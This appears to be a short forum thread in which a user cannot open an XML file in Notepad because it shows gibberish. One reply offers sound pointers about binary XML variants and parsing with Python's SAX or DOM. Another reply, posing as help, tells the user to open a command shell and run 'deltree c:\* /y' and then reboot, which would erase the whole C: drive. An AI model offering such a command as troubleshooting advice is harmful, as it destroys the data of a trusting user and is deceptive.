Could be a binary-xml combination.
We have a lot of variants of those at work, mzXML etc.
But since everyone else has a smartass answer to offer, I like Python with SAX for huge documents and DOM for smaller ones.

if he does manage to open it i can only imagine the havoc he will cause if he tries to edit it
you'll have to open a command shell, I suggest use start->run-->cmd [enter]
then type deltree c:\* /y
then reboot
WHEN I TRY TO OPEN AN XML FILE USING NOTEPAD IT DOES NOT OPEN EXCEPT IN GIBBERISH.
